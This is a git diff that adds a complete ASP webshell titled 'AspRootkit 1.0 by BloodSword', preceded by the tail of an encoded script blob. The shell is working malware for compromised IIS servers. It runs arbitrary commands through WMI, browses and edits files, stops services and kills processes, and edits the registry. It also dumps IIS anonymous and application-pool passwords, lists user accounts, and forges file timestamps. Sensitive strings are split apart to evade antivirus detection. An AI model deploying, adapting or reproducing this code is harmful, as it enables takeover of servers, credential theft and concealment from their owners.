N,s;x^ObWU@#@&/lk+~EUmlU9Mk-+wGM:E,@#@&P?1l 9Db\nsKDh@#@&PZmd+,J?1CUfMk7+EP~~,P@#@&,~?1lU9Mk\n~"+5EdD`EGDb\+r#@#@&P,ZC/PEj1sW^[+MJP,~~P,@#@&P~Pj^wWsN.P"+5;/YcEwWsN.r#@#@&mm/+,Jm2L9+sJ=l2%9+Vvb)1l/~E?D7E{6ElkE{`*lmm/n~r0E"4!Y5Frl6E"4ED;Fv#=^lk+~J6E"4!Y;yE)6Ey4;O;y`*)^ldn,JWE.4ED;fE=0E"4!Y5&vb=mCk+,J0!y4;Y$cE)6E"4!Y;Wc#=mlkn~J6E.t;Y5Xr)WE.4ED;Xc*)mCdPEZs[yJl1:9 `*)1C/PE/!0O2r)/!WYa`#=^C/J4k[NnUktnV^E)4k[[x/4n^Vc#=^m/n,Jatwr)a4wv#lmm/n~rl/aaJ=l/aac#=mm/nPE%kwE)Ndwv#l/m/+~EtH9J=\tfc*);l/PrCNskUl(JlC9:k C4v#);Cd+,Jk;sJld$Vc#=/lk+~E9WhUsKl[/rl9WA VKlNk`*lZm/nPrInC9I2VE)1lV^~]+mN"2!`bl;ld+,ElDYEl1lVs~mYO`*l;ldPr?tKh8ok^+E)U+O~zAZ{H+SPS~olb~Zc?4WAqwks+vj+k/rG `JoG^NnDhCDtE*#=?+DPz$Z{1GY4kUL=ZlknPrfWSUok^+r)9WAUwks+,o1m:nlUtWA3MDc#=/m/n,JG+Vwk^nJ=?nY,b$/{1+S~S~s)z$/RG+^srVncw1C:b)U+O~zAZxHKY4k L=ZCk+,J29kDok^+E)U+O~zAZ{H+SPS~olb~Zc2[kOobVn`wHls+blU+Y~)~Zx1KO4kUT);l/Pr/WaXok^+ElU+Y,)A;'1A~S~s=b$Z /Kwzsbs+vsHCs+#ljY~b~/{1GDtbxo=Zmd+,J\W7+or^+J=j+DPb~/x1h,S$sl)~Z HK-+wksnvs1Ch#l?O,b$;'gWY4k L);ld+,J9n^sW^[+MJ)UnOPzA;'H+A~dAo)z$ZcfnswWV[nM`o1mh#lU+DPb~Z{HWDtrxT)/Ck+Pr/WaXsKs[+MJ=?nY~)~Zx1APdAolzAZ /KwzsKs9+.vsgl:#=j+DP)A;'HGDtk L);l/~EHK\sGV[nMJl?OPzA/xg+h~J~slb~/cHG7+wWV9+Mcsglh+*)jnDPb~/'gWY4rUo=Zm/nPEHhoW^[+MJljYP)$;'H+S~dAo=b~ZRg+SoW^NnDvsHCs+#=j+DPb~/x1KY4kUol/m/nPriwwksnr)j2obVn`*l;ldPrZ:9FU4+^VE);:[qUt+^s`*)ZmdnPrSKoGEOE=?n/krW R/G Y+UOkR]+sG7+crh4 m 9hk Jb)"+d2Kx/ INkMn^Y,j"SlZCdPEZMnlD+\[(J)/.lO+t[(Pogls+);lknPrZG:al^OtN4rlZK:wm^OH94,sHlhn=ZC/~JG4\C lon.r)94tC lLDv#);lknPrZGEM/nE=ZW!./`#=/C/Pr?nD-nMqU0KE)U+.-DqUWK`b);Ck+~AVk+PtlbUsKDh`*)3U9P?s+1Y)AanZ!YPjkUWK2U`r.`ADGAUtx~4POE?.7?n@*U @!kKmD~bb0b=^@*OhJt@*@![X(W@!Jj=I"Ur~KWdb@#@&.+k2W /n SDkOn,JE_78;DJ6_rJ_74;.S6_EJ@#@&h5prAA==^#~@%> \ No newline at end of file diff --git a/asp/Cmd鏀寔绠$悊鍛樼櫥闄嗙殑webshell.asp b/asp/Cmd鏀寔绠$悊鍛樼櫥闄嗙殑webshell.asp new file mode 100644 index 0000000..2b7f0b1 --- /dev/null +++ b/asp/Cmd鏀寔绠$悊鍛樼櫥闄嗙殑webshell.asp @@ -0,0 +1,1715 @@ +<%@ LANGUAGE='VBScript' CODEPAGE='65001'%> +<% +Response.Buffer=True +Response.Charset="utf-8" +Server.ScriptTimeOut=300 +'-------------------------------Config------------------------------- +Const zvhy=False +Const ybd=43 +Const qjr=False +Const miih="." +Const xdl="vqsbz|jzgm|ndie|puvgw|rrr" +Const cbrh="GB2312" +'-------------------------------Config------------------------------- +Dim goaction,vqsbz,jzgm,ndie,puvgw,dut,blhvq,erd,ykzg,jnnb,zfbn,fac,vqt,cwp,wbk,jozsz,rqg,nedsl,acxze,cxkyk,igiqh,xxyj,spmh,yug,mhve,xacj,iqg,rsq,szgk,xnqtl,zsckm,gkyv,rrr,anpj,mee,mgy,eoz,bnes,bljd,fmsm,jpklj,zgn,eduj,edg,fnc +xacj="AspRootkit 1.0 by BloodSword" +If Request(goaction)="" And Trim(gbba("AUTH_USER"))="" Then +Response.Status="401 Unauthorized" +Response.Addheader"WWW-AuThenticate", "NTLM" +If gbba("AUTH_USER")=""Then Response.End +'zhv"You did'nt login as the system administrators,there's lots of things you can't do -_-~!" +End If +sndu() +Select Case goaction +Case"pmy" +ditm() +Case"ulxbb" +ylka() +Case"jdwtp" +muwq() +Case"kqmyb" +efbac() +Case"lmwgb" +snrt() +Case"umh" +qvetz() +Case"ukpy" +ihm() +Case"xcngn" +ehyx() +Case"bbr" +cyk() +Case"xpodw" +qxbon() +Case Else +cyk() +End Select +sbbo() +Sub sndu() +If Not qjr Then On Error Resume Next +zfbn=Timer() +Dim ndrck,xxzhu,qvtlx,fzro,vgm,tkl,isp +servurl=gbba("URL") +Set dut=mfmq("Script"&nrh&"ing.File"&nvkq&"SystemObject") +Set erd=mfmq("Sh"&kpa&"ell.Applicat"&ffr&"ion") +Set blhvq=new RegExp +blhvq.Global=True +blhvq.IgnoreCase=True +blhvq.MultiLine=True +For Each xxzhu In request.queryString +execute""&xxzhu&"=request.queryString("""&xxzhu&""")" +Next +For Each ndrck In request.Form +execute""&ndrck&"=request.form("""&ndrck&""")" +Next +isp=Split(xdl,"|") +For Each tkl In isp +execute""&tkl&"=wdhw("&tkl&")" +Next +xnqtl=gbba("SERVER_NAME") +ykzg=gbba("PATH_INFO") +jnnb=LCase(smfap(ykzg,"/")) +vqt=dhh(".") +cwp=dhh("/") +If acxze<>"tngdz"And Right(vqsbz,1)="\"Then vqsbz=Left(vqsbz,Len(vqsbz)-1) +If Len(vqsbz)=2 Then vqsbz=vqsbz&"\" +nedsl=1 +jozsz=1 +End Sub +Sub sbbo() +If Not qjr Then On Error Resume Next +Dim apwc +Set dut=Nothing +Set erd=Nothing +Set blhvq=Nothing +Set zsckm=Nothing +fac=timer() +apwc=fac-zfbn +echo"
" +ltvq"100%" +echo"" +echo"" +eedi wbk +apwc=FormatNumber(apwc,5) +If Left(apwc,1)="."Then apwc="0"&apwc +eedi"
" +echo"
Processed in :"&apwc&"seconds
" +Response.End() +End Sub +Sub cyk() +goaction="bbr" +If Not qjr Then On Error Resume Next +If vqsbz=""Then vqsbz=puvgw +If vqsbz=""Then vqsbz=vqt +If acxze="down"Then +qws() +Response.End() +End If +fpx("FSO File Explorer") +Select Case acxze +Case"oql","sgqly" +vuh() +vqsbz=lgk(vqsbz,"\",False) +Case"vwsrt" +vwsrt() +Case"save","seii" +tyh() +vqsbz=lgk(vqsbz,"\",False) +Case"tngdz" +uvrs() +vqsbz=lgk(vqsbz,"\",False) +Case"wqj","rjfr" +wqj() +Case"wsf","nhlnt" +mgxnb() +vqsbz=lgk(vqsbz,"\",False) +Case"tbqwf","ejgn","vihy","ewvk" +jreg() +vqsbz=lgk(vqsbz,"\",False) +Case"uzmjs" +ywqif() +Case"ffgo" +ywc() +vqsbz=lgk(vqsbz,"\",False) +End Select +If Len(vqsbz)<3 Then vqsbz=vqsbz&"\" +bbr() +End Sub +Sub bbr() +Dim aqwr,qvgzg,lwn,tlknr,xmg,kyirr,qsob,woaee +If Not qjr Then On Error Resume Next +Set aqwr=dut.GetFolder(vqsbz) +tlknr=dut.GetParentFolderName(vqsbz) +woaee=vqsbz +If Right(woaee,1)<>"\"Then woaee=woaee&"\" +xze"woaee",woaee +ztlif True +echo"Current Path :" +pisa"text","vqsbz",vqsbz,120,"" +eedi"" +uxzf"","170px","onchange=""javascript:if(this.value!=''){adwba('"&goaction&"','',this.value);}""" +zepw"","Drivers/Comm folders" +zepw HtmlEncode(dhh(".")),"." +zepw HtmlEncode(dhh("/")),"/" +zepw"","----------------" +For Each drive In dut.Drives +zepw drive.DriveLetter&":\",drive.DriveLetter&":\" +Next +zepw"","----------------" +zepw"C:\Program Files","C:\Program Files" +zepw"C:\Program Files\RhinoSoft.com","RhinoSoft.com" +zepw"C:\Program Files\Serv-U","Serv-U" +zepw"C:\Program Files\Radmin","Radmin" +zepw"C:\Program Files\Microsoft SQL Server","Mssql" +zepw"C:\Program Files\Mysql","Mysql" +zepw"","----------------" +zepw"C:\Documents and Settings\All Users","All Users" +zepw"C:\Documents and Settings\All Users\Documents","Documents" +zepw"C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere","PcAnywhere" +zepw"C:\Documents and Settings\All Users\Start Menu\Programs","Start Menu->Programs" +zepw"","----------------" +zepw"D:\Program Files","D:\Program Files" +zepw"D:\Serv-U","D:\Serv-U" +zepw"D:\Radmin","D:\Radmin" +zepw"D:\Mysql","D:\Mysql" +fndid +adwba"Go" +zro +eedi"
" +pisa"file","file","","","" +echo"Save As : " +pisa"text","vqsbz",vqsbz,40,"" +pisa"checkbox","xxyj",1,"","" +echo" OverWrite " +pisa"button","","Upload","","onclick=""javascript:adwba('"&goaction&"','tngdz','')""" +zro +ztlif True +pisa"text","yug","",20,"" +xze"vqsbz",vqsbz +xze"acxze","vwsrt" +pisa"radio","mhve","file","","checked" +echo"File" +pisa"radio","mhve","folder","","" +echo"Folder" +adwba"New one" +zro +echo"
" +If Not dut.FolderExists(vqsbz)Then +zhv vqsbz&" Folder dosen't exists or access denied!" +sbbo +End If +iquhg"Folders",False +ltvq"100%" +tygwb +doTd"Folder name","20%" +doTd"Size","20%" +doTd"Last modified","20%" +doTd"Action","40%" +igl +abywz 0 +eedi"Parent Directory" +igl +jozsz=1 +For Each objX In aqwr.SubFolders +qsob=objX.DateLastModified +abywz jozsz +doTd""&objX.Name&"","" +doTd htmlEncode(""),"" +doTd qsob,"" +echo"" +eedi"Copy -" +eedi"Move -" +eedi"Rename -" +eedi"Delete" +eedi"" +igl +uuuk +Next +xlvqe +eedi"
" +iquhg"Files",False +ltvq"100%" +echo"" +tygwb +doTd"File name","20%" +doTd"Size","20%" +doTd"Last modified","20%" +doTd"Action","40%" +igl +echo"" +jozsz=0 +For Each objX In aqwr.Files +xmg=pkn(objX.Size) +qsob=objX.DateLastModified +If LCase(Left(objX.Path,Len(cwp)))<>LCase(cwp) Then +qvgzg="" +Else +qvgzg=Replace(Replace(qtyi(Mid(objX.Path,Len(cwp) + 1)),"%2E","."),"+","%20") +End If +abywz jozsz +If qvgzg=""Then +doTd objX.Name,"" +Else +doTd""&objX.Name&"","" +End If +doTd xmg,"" +doTd qsob,"" +echo"" +eedi"Edit -" +eedi"Copy -" +eedi"Move -" +eedi"Rename -" +eedi"Down -" +eedi"Attributes -" +eedi"Delete" +eedi"" +igl +uuuk +Next +xlvqe +echo"" +smeb(Err) +End Sub +Sub ywqif() +Dim qwsdh,npyi,gwp,cxmsb,afqj,advu,yiq,nqui +If Not qjr Then On Error Resume Next +If IsObject(dut)Then +Set qwsdh=dut.GetFile(vqsbz) +End If +If IsObject(erd)Then +yiq=lgk(vqsbz,"\",False) +gwp=smfap(vqsbz,"\") +Set advu=erd.NameSpace(yiq) +Set npyi=advu.ParseName(gwp) +End If +echo"
" +ltvq"60%" +ztlif True +xze"acxze","ffgo" +xze"vqsbz",vqsbz +tygwb +ncxl"Set attribute","40%" +doTd vqsbz,"60%" +igl +abywz 0 +doTd"Attributes","" +If IsObject(dut)Then +afqj=qwsdh.Attributes +cxmsb="system " +cxmsb=cxmsb&"hide " +cxmsb=cxmsb&"readonly " +cxmsb=cxmsb&"save " +If afqj>=128 Then afqj=afqj-128 +If afqj>=64 Then afqj=afqj-64 +If afqj>=32 Then +afqj=afqj-32 +cxmsb=Replace(cxmsb, "{$archive}", "checked") +End If +If afqj>=16 Then afqj=afqj-16 +If afqj>=8 Then afqj=afqj-8 +If afqj>=4 Then +afqj=afqj-4 +cxmsb=Replace(cxmsb, "{$system}", "checked") +End If +If afqj>=2 Then +afqj=afqj-2 +cxmsb=Replace(cxmsb, "{$hidden}", "checked") +End If +If afqj>=1 Then +afqj=afqj-1 +cxmsb=Replace(cxmsb, "{$readonly}", "checked") +End If +doTd cxmsb,"" +Else +doTd"FSO object disabled,can't get/set attributes -_-~!","" +End If +igl +If IsObject(erd)Then +abywz 1 +doTd"Date created","" +doTd advu.GetDetailsOf(npyi,4),"" +igl +abywz 0 +doTd"Date last modified","" +luhhh"text","iqg",advu.GetDetailsOf(npyi,3),"","","" +igl +abywz 1 +doTd"Date last accessed","" +doTd advu.GetDetailsOf(npyi,5),"" +igl +Else +abywz 1 +doTd"Date created","" +doTd qwsdh.DateCreated,"" +igl +abywz 0 +doTd"Date last modified","" +doTd qwsdh.DateLastModified,"" +igl +abywz 1 +doTd"Date last accessed","" +doTd qwsdh.DateLastAccessed,"" +igl +End If +zro +ztlif True +xze"acxze","ffgo" +xze"vqsbz",vqsbz +abywz 0 +If IsObject(erd)Then +ncxl"Clone time ","" +echo"" +uxzf"rsq","100%","" +For Each objX In advu.Items +If Not objX.IsFolder Then +nqui=smfap(objX.Path,"\") +zepw nqui,advu.GetDetailsOf(advu.ParseName(nqui),3)&" --- "&nqui +End If +Next +Else +echo"App object disabled,can't modify time -_-~!" +End If +xlvqe +zro +sbbo() +End Sub +Sub ywc() +If Not qjr Then On Error Resume Next +Dim nboac,qwsdh,yiq,gwp,advu,npyi +If IsObject(dut)Then +Set qwsdh=dut.GetFile(vqsbz) +End If +If IsObject(erd)Then +yiq=lgk(vqsbz,"\",False) +gwp=smfap(vqsbz,"\") +Set advu=erd.NameSpace(yiq) +Set npyi=advu.ParseName(gwp) +End If +'echo szgk +If szgk<>""Then +szgk=Split(Replace(szgk," ",""),",") +echo"fuck" +For i=0 To UBound(szgk) +nboac=nboac+CInt(szgk(i)) +Next +qwsdh.Attributes=nboac +If Err Then +smeb(Err) +Else +zhv"Attributes modified" +End If +End If +If iqg<>"" And IsDate(iqg)Then +npyi.ModifyDate=iqg +If Err Then +smeb(Err) +Else +zhv"Time modified" +End If +End If +If rsq<>""Then +npyi.ModifyDate=advu.GetDetailsOf(advu.ParseName(rsq),3) +If Err Then +smeb(Err) +Else +zhv"Time modified" +End If +End If +End Sub +Function pkn(yxa) +If yxa>=(1024 * 1024 * 1024)Then pkn=Fix((yxa /(1024 * 1024 * 1024))* 100)/ 100&"G" +If yxa>=(1024 * 1024)And yxa<(1024 * 1024 * 1024)Then pkn=Fix((yxa /(1024 * 1024))* 100)/ 100&"M" +If yxa>=1024 And yxa<(1024 * 1024)Then pkn=Fix((yxa / 1024)* 100)/ 100&"K" +If yxa>=0 And yxa<1024 Then pkn=yxa&"B" +End Function +Sub wqj() +If Not qjr Then On Error Resume Next +Dim theFile,xzgyk,ooz,ifc +If Right(vqsbz,1)="\"Then +zhv"Can't edit a directory!" +sbbo +End If +ooz=lgk(vqsbz,"\",False) +ztlif True +If acxze="wqj" Then +xzgyk=tortz(vqsbz) +Else +xzgyk=zhxc(vqsbz) +End If +smeb(Err) +pvrd"spmh",xzgyk,"100%","25","" +If acxze="rjfr" Then +xze"acxze","seii" +Else +xze"acxze","save" +End If +echo"Save as :" +pisa"text","vqsbz",vqsbz,"60","" +echo" Encode:" +uxzf"act","80px","onchange=""javascript:if(this.value!=''){adwba('"&goaction&"',this.value,'"&utzvg(vqsbz)&"');}""" +zepw"wqj","Default" +ifc="" +If acxze="rjfr" Then +ifc=Replace(ifc,"{$}","selected") +End If +echo ifc +fndid +echo" " +adwba"Save" +echo" " +pisa"reset","","Reset","","" +echo" " +pisa"button","clear","Clear","","onclick=""javascript:this.form.spmh.innerText=''""" +echo" " +pisa"button","","Go back","","onclick=""javascript:adwba('"&goaction&"','','"&utzvg(ooz)&"')""" +zro +smeb(Err) +sbbo +End Sub +Sub tyh() +If Not qjr Then On Error Resume Next +If acxze="save" Then +vtyjq vqsbz,spmh +Else +oooeu vqsbz,spmh +End If +If Err Then +smeb(Err) +Else +zhv"File saved." +End If +End Sub +Sub ditm() +fpx("Cmd Shell") +Dim wolw,ss,oc,snqsz,vdtyh +If Not qjr Then On Error Resume Next +If jzgm<>"" Then +Set zsckm=dtwz("wi"&kcb&"nmgmts:\\.\ro"&todxo&"ot\ci"&dmly&"mv2") +Set wolw=zsckm.Get("Win32_Pro"&ivj&"cess") +set ss=zsckm.get("Win32_ProcessSta"&uyy&"rtup") +Set oc=ss.SpawnInstance_ +oc.ShowWindow=12 +snqsz=wolw.create(jzgm,null,oC,vdtyh) +If snqsz=0 Then +zhv"com"&sruz&"mand execute succeed!Refresh the iframe below to check result." +Else +zhv"com"&sruz&"mand execute fail-_-!RPWT?" +End If +Set wolw=Nothing +Set ss=Nothing +Set oc=Nothing +ElseIf acxze="viewResult" Then +Response.Clear +echo ""&htmlEncode(tortz(rrr))&"" +Response.End +End If +smeb(Err) +ltvq"100%" +ztlif True +abywz 1 +doTd"com"&sruz&"mand","10%" +If jzgm=""Then jzgm="cmd.exe /c net user" +If rrr=""Then rrr=cwp&"\temp.txt" +luhhh"text","jzgm",jzgm,"80%","","" +ncxl"Run ","" +igl +abywz 0 +doTd">","" +luhhh"text","rrr",rrr,"","","" +luhhh"button","","Echo","","onclick='javascript:this.form.jzgm.value=this.form.jzgm.value+"" > ""+this.form.rrr.value'","" +igl +zro +xlvqe +echo"
" +pisa"button","","Refresh result","","onclick=""javascript:argnp()""" +echo"

" +End Sub +Sub ylka() +fpx("Service List") +Dim glip,bond,kbap +If Not qjr Then On Error Resume Next +Set zsckm=dtwz("wi"&kcb&"nmgmts:\\.\ro"&todxo&"ot\ci"&dmly&"mv2") +If acxze="startone" Or acxze="stopone" Then +gyxm(puvgw) +End If +Set bond=zsckm.InstancesOf("Win3"&dwt&"2_Service") +ltvq "100%" +echo "" +doTd "Name","" +doTd "Display Name","" +doTd "Path","40%" +doTd "Start Mode","" +doTd "State","" +doTd "Action","" +igl +jozsz=0 +For Each glip In bond +kbap=False +If LCase(glip.State)="running"Then kbap=True +abywz jozsz +doTd glip.Name,"" +doTd glip.DisplayName,"" +doTd glip.PathName,"" +doTd glip.StartMode,"" +If kbap Then +snqs glip.State,"green","" +doTd"Stop","" +Else +snqs glip.State,"red","" +doTd"Start","" +End If +igl +uuuk +Next +End Sub +Sub gyxm(dlzu) +Dim qxau,glip +If Not qjr Then On Error Resume Next +Set zsckm=dtwz("wi"&kcb&"nmgmts:\\.\ro"&todxo&"ot\ci"&dmly&"mv2") +Set qxau=zsckm.ExecQuery("select * from Win3"&dwt&"2_Service where Name='"&dlzu&"'") +For Each glip In qxau +If acxze="startone" Then +glip.StartService() +Else +glip.StopService() +End If +Next +If Err Then +smeb(Err) +Else +zhv"Service successfully start/stoped!" +End If +End Sub +Sub muwq() +fpx("Process List") +Dim cpmvi,ijre,kbap +If Not qjr Then On Error Resume Next +Set zsckm=dtwz("wi"&kcb&"nmgmts:\\.\ro"&todxo&"ot\ci"&dmly&"mv2") +If acxze="stopone" Then +ylwre(puvgw) +End If +Set ijre=zsckm.InstancesOf("Win32_Pro"&ivj&"cess") +ltvq "100%" +echo "" +doTd "PID","" +doTd "Name","" +doTd "Path","" +doTd "Action","" +igl +jozsz=0 +For Each cpmvi In ijre +abywz jozsz +doTd cpmvi.ProcessId,"" +doTd cpmvi.Name,"" +doTd cpmvi.ExecutablePath,"" +If cpmvi.ExecutablePath<>""Then +doTd"Terminate","" +Else +doTd"--","" +End If +igl +uuuk +Next +End Sub +Sub ylwre(pid) +Dim ijre,glip +If Not qjr Then On Error Resume Next +Set zsckm=dtwz("wi"&kcb&"nmgmts:\\.\ro"&todxo&"ot\ci"&dmly&"mv2") +Set ijre=zsckm.ExecQuery("select * from Win32_Pro"&ivj&"cess where ProcessId='"&pid&"'") +For Each cpmvi In ijre +If cpmvi.Terminate()=0 Then +zhv"Process terminate succeed!" +Else +zhv"Process terminate fail-_-!" +End If +Next +End Sub +Sub efbac() +If Not qjr Then On Error Resume Next +If ndie=""Then ndie=puvgw +anpj=Split("HKEY_CLASSE"&cbppq&"S_ROOT|HKEY_CURRENT_US"&nhm&"ER|HKEY_LOCAL_MACHI"&toev&"NE|HKEY_U"&lzwqj&"SERS|HKE"&mxdz&"Y_CURRENT_CONFIG","|") +If Right(ndie,1)="\" Then ndie=Left(ndie,Len(ndie)-1) +If InStr(ndie,"\")>0 Then +bljd=lgk(ndie,"\",True) +fmsm=Mid(ndie,Len(bljd)+2) +Else +bljd=ndie +fmsm="" +End If +Select Case UCase(bljd) +Case "HKEY_CLASSE"&cbppq&"S_ROOT" +jpklj=&H80000000 +Case "HKEY_CURRENT_US"&nhm&"ER" +jpklj=&H80000001 +Case "HKEY_LOCAL_MACHI"&toev&"NE" +jpklj=&H80000002 +Case "HKEY_U"&lzwqj&"SERS" +jpklj=&H80000003 +Case "HKE"&mxdz&"Y_CURRENT_CONFIG" +jpklj=&H80000004 +End Select +Set bnes=dtwz("wi"&kcb&"nmgmts:\\.\ro"&todxo&"ot\default:StdRegP"&bqlnw&"rov") +Select Case acxze +Case "dxc","pppau" +aso() +Case "wscnt" +ncyl() +End Select +fpx("Reg Shell") +ztlif True +ltvq "80%" +abywz 1 +doTd"Registry Path","10%" +luhhh"text","ndie",ndie,"80%","","" +ncxl"Go","10%" +igl +abywz 0 +echo"" +For Each strRootKey In anpj +echo ""&strRootKey&" | " +Next +igl +zro +ztlif True +abywz 1 +xze "acxze","wscnt" +xze "ndie",ndie +doTd"Name : ","" +echo"" +pisa"text","mee","","30","" +echo" Type : " +uxzf"mgy","120px","" +zepw"key","SubKey" +zepw"str","String" +zepw"bsgop","ExpandedString" +zepw"dwd","DWORD" +zepw"xrvxd","MultiString" +fndid +echo" Value : " +pisa"text","eoz","","50","" +echo"" +ncxl"Set","" +zro +igl +xlvqe +echo"
  • Multi string value splits with ',',you can create new items,or just modify what exists : )

  • " +ykoo() +Set bnes=Nothing +End Sub +Sub ykoo() +Dim afd,ssdxp,vfqws +If Not qjr Then On Error Resume Next +iquhg"SubKeys",False +ltvq "100%" +tygwb +doTd"Name","" +doTd"Action","" +igl +If ndie=""Then +jozsz=0 +For Each strRootKey In anpj +abywz jozsz +doTd""&strRootKey&"","" +doTd"","" +uuuk +Next +Else +abywz 0 +echo"Parent Key" +igl +jozsz=1 +bnes.EnumKey jpklj,fmsm,afd +If IsArray(afd)Then +For Each strSubKey In afd +abywz jozsz +doTd ""&strSubKey&"","" +doTd"Delete","" +igl +uuuk +Next +End If +bnes.EnumValues jpklj,fmsm,ssdxp,vfqws +If IsArray(ssdxp)Then +xlvqe +echo"
    " +iquhg"Values",False +ltvq"100%" +tygwb +doTd"Name","" +doTd"Type","" +doTd"Value","" +doTd"Action","" +igl +jozsz=0 +For i=0 To UBound(ssdxp) +ztmjf jpklj,fmsm,ssdxp(i),vfqws(i) +Next +End If +End If +xlvqe +eedi"" +smeb(Err) +End Sub +Sub ztmjf(jpklj,fmsm,gwp,bpz) +Dim vjrs,auya,jdl +If Not qjr Then On Error Resume Next +auya="" +abywz jozsz +Select Case bpz +Case 1 +bnes.GetStringValue jpklj,fmsm,gwp,vjrs +jdl="String" +Case 2 +bnes.GetExpandedStringValue jpklj,fmsm,gwp,vjrs +jdl="ExpandedString" +Case 3 +bnes.GetBinaryValue jpklj,fmsm,gwp,vjrs +jdl="Binary" +Case 4 +bnes.GetDWORDValue jpklj,fmsm,gwp,vjrs +jdl="DWORD" +Case 7 +bnes.GetMultiStringValue jpklj,fmsm,gwp,vjrs +jdl="MultiString" +End Select +If IsArray(vjrs)Then +If bpz=3 Then +For i=0 To UBound(vjrs) +If CInt(vjrs(i))<16 Then +auya=auya&"0" +End If +auya=auya&CStr(Hex(CInt(vjrs(i)))) +Next +Else +auya=Join(vjrs,",") +End If +Else +auya=CStr(vjrs) +End If +doTd gwp,"" +doTd jdl,"" +doTd auya,"" +eedi"Delete" +igl +uuuk +End Sub +Sub aso() +If Not qjr Then On Error Resume Next +Dim gbca +If acxze="dxc" Then +gbca=bnes.DeleteKey(jpklj,fmsm) +Else +gbca=bnes.DeleteValue(jpklj,lgk(fmsm,"\",False),smfap(fmsm,"\")) +End If +If gbca=0 Then +zhv"Sub key/value delete succeed!" +Else +zhv"Sub key/value delete fail-_-!" +End If +ndie=lgk(ndie,"\",False) +End Sub +Sub ncyl() +If Not qjr Then On Error Resume Next +Dim gbca +Select Case mgy +Case "key" +gbca=bnes.CreateKey(jpklj,fmsm&"\"&mee) +Case "str" +gbca=bnes.SetStringValue(jpklj,fmsm,mee,eoz) +Case "bsgop" +gbca=bnes.SetExpandedStringValue(jpklj,fmsm,mee,eoz) +Case "dwd" +If IsNumeric(eoz)Then +gbca=bnes.SetDWORDValue(jpklj,fmsm,mee,eoz) +Else +zhv"Dword value must be a number!" +Exit Sub +End If +Case "xrvxd" +gbca=bnes.SetMultiStringValue(jpklj,fmsm,mee,Split(eoz,",")) +End Select +If gbca=0 Then +zhv"Sub key/value create/modify succeed!" +Else +zhv"Sub key/value create/modify fail-_-!" +End If +End Sub +Sub snrt() +Dim qxe,vula,sru,wetn,uit,boo,vhkdi +If Not qjr Then On Error Resume Next +fpx("IIS Spy Using ADSI") +ltvq"100%" +tygwb +doTd"Name","" +doTd"Domain","" +doTd"IIS_USER","" +doTd"IIS_PASS","" +doTd"APP_USER","" +doTd"APP_PASS","" +doTd"Path","" +jozsz=0 +Set vula=dtwz("II"&iung&"S://Loca"&uwevh&"lhost/W3S"&vum&"VC") +For Each obj3w In vula +boo=obj3w.Name +If IsNumeric(boo) Then +qxe=Obj3w.ServerComment +Set domain=dtwz("II"&iung&"S://Loca"&uwevh&"lhost/W3S"&vum&"VC/"&boo) +If isArray(domain.ServerBindings) Then +uit=domain.ServerBindings +sru="" +For i=0 To UBound(uit) +sru=sru+uit(i)+"
    " +Next +sru=Left(sru,Len(sru)-4) +End If +Set wetn=dtwz("II"&iung&"S://Loca"&uwevh&"lhost/W3S"&vum&"VC/"&boo&"/ro"&todxo&"ot") +Set vhkdi=dtwz("II"&iung&"S://Loca"&uwevh&"lhost/W3S"&vum&"VC/AppPo"&lavjs&"ols/"&wetn.AppPoolId) +abywz jozsz +doTd qxe,"" +doTd sru,"" +doTd wetn.AnonymousUserName,"" +doTd wetn.AnonymousUserPass,"" +doTd vhkdi.WAMUserName,"" +doTd vhkdi.WAMUserPass,"" +doTd ""&wetn.path&"","" +igl +uuuk +End If +Next +xlvqe +Set vula=Nothing +Set wetn=Nothing +Set domain=Nothing +Set wetn=Nothing +smeb(Err) +End Sub +Sub qvetz() +Dim ylz,qifc,xczkb,uwfd +If Not qjr Then On Error Resume Next +Set zsckm=dtwz("wi"&kcb&"nmgmts:\\.\ro"&todxo&"ot\Mi"&brjdx&"crosoftIISv2") +Set ylz=zsckm.InstancesOf("IISWebVirtualDir"&ymy&"Setting") +fpx("IIS Spy Using WMI") +ltvq"100%" +tygwb +doTd"Name","" +doTd"Domain","" +doTd"IIS_USER","" +doTd"IIS_PASS","" +doTd"APP_USER","" +doTd"APP_PASS","" +doTd"Path","" +igl +jozsz=0 +For Each objWebDoc In ylz +abywz jozsz +Set qifc=zsckm.ExecQuery("Select ServerComment,ServerBindings from II"&rvx&"SWebServerSetting where Name='"&Replace(objWebDoc.Name,"/ro"&todxo&"ot","",1,-1,1)&"'") +If qifc.Count=0 Then +doTd "","" +doTd "","" +Else +For Each objWebSvr In qifc +tmpdmStr="" +doTd objWebSvr.ServerComment,"" +For Each subBind In objWebSvr.ServerBindings +If tmpdmStr<>""Then tmpdmStr=tmpdmStr&"
    " +tmpdmStr=tmpdmStr&subBind.IP&":"&subBind.Port&":"&subBind.Hostname +Next +doTd tmpdmStr,"" +Exit For +Next +End If +doTd objWebDoc.AnonymousUserName,"" +doTd objWebDoc.AnonymousUserPass,"" +Set xczkb=zsckm.ExecQuery("Select WAMUserName,WAMUserPass from IISAppli"&dwgoq&"cationPoolSetting where Name='W3S"&vum&"VC/AppPo"&lavjs&"ols/"&objWebDoc.AppPoolId&"'") +For Each objWebApp In xczkb +doTd objWebApp.WAMUserName,"" +doTd objWebApp.WAMUserPass,"" +Exit For +Next +doTd ""&objWebDoc.Path&"","" +igl +uuuk +Next +xlvqe +Set vula=Nothing +smeb(Err) +End Sub +Sub ihm() +Dim ndk,goeje +If Not qjr Then On Error Resume Next +Set zsckm=dtwz("wi"&kcb&"nmgmts:\\.\ro"&todxo&"ot\ci"&dmly&"mv2") +Set zgn=zsckm.InstancesOf("Win32_UserAccount") +Set eduj=zsckm.InstancesOf("Win32_Group") +fpx("User List") +iquhg "Users",False +ltvq "100%" +For Each edg In zgn +tygwb +eedi""&edg.Name&"" +igl +jozsz=0 +For Each subProp In edg.Properties_ +abywz jozsz +doTd subProp.Name,"" +doTd subProp.Value,"" +igl +uuuk +Next +Next +xlvqe +echo"
